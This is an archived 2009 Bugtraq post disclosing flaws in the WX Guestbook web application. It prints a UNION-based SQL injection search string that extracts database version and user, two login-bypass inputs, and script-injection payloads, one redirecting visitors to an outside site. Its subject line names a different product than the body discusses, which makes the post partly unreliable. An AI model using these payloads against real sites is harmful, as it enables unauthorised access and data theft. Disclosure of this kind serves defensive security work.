| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20091213124446.23873.qmail@securityfocus.com>
Date: 13 Dec 2009 12:44:46 -0000
From: admin@...n0x.com
To: bugtraq@...urityfocus.com
Subject: Loggix Project <= 9.4.5 Multiple Remote File Inclusion
Vulnerabilities
###########################################
# WX Guest Book 1.1.208 Vulns #
# By xxHackerXzX hacker from nepal #
# admin@...n0x.comm #
###########################################
Product name: WX Guestbook 1.1.208
Product vendor: http://www.ekin0x.com/r57.txt
This product suffers from multiple SQLi and persistent XSS vuln.
############## SQL Search Vuln ###############
The search parameters/queries we submit to the search.php are unsanitized and hence this can be compromised to SQLinject the server.
SQL query:
$signs = DB_Execute("SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%" . $QUERY . "%') ORDER BY `code` DESC");
The $QUERY is what we submit through search box so injecting this will sql inject the server.
The following is the sample sql injection example.
Sample search string: test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/*
############## SQL login bypass ###############
The username and password fields are unsanitized and hence we can bypass the login systems.
Username: admin'))/*
Password: learn3r [or whatever]
Or
Username: ')) or 1=1/*
Password: learn3r [or whatever]
############## Persistent XSS Vulns ##############
In the name field (I suppose as I don't understand arabic), you can inject XSS...
<script>alert(String.fromCharCode(97));</script>
<script>location.replace("http://www.ekin0x.com")</script>
Powered by blists - more mailing lists